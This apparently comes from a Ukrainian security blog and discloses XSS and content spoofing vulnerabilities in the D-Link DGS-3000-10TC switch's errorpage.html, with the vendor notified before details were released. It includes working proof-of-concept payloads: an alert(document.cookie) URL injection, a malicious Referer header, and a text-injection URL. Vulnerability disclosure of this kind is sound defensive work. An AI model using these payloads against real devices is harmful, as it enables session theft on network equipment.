Websecurity - Веб безпека

28.07.2017

Сьогодні я знайшов Cross-Site Scripting та Content Spoofing уразливості в D-Link DGS-3000-10TC. Це Gigabit Ethernet Switch.

Раніше я писав про уразливості в пристроях даної компанії, зокрема в D-Link DAP-1360 та D-Link DGS-3200-16.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

16.09.2017

Cross-Site Scripting (WASC-08):

http://site/html/errorpage.html?%22;alert(document.cookie);//

Cross-Site Scripting (WASC-08):

http://site/html/errorpage.html

Атака через заголовок “Referer: javascript:alert(document.cookie)”.

Content Spoofing (WASC-12):

http://site/html/errorpage.html?You%20are%20hacked!

Можлива Text Injection атака.

Уразлива версія D-Link DGS-3000-10TC, Firmware Version 2.00.006. Дана модель з іншими прошивками також повинна бути вразливою.

This entry was posted on 20:03 16.09.2017 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.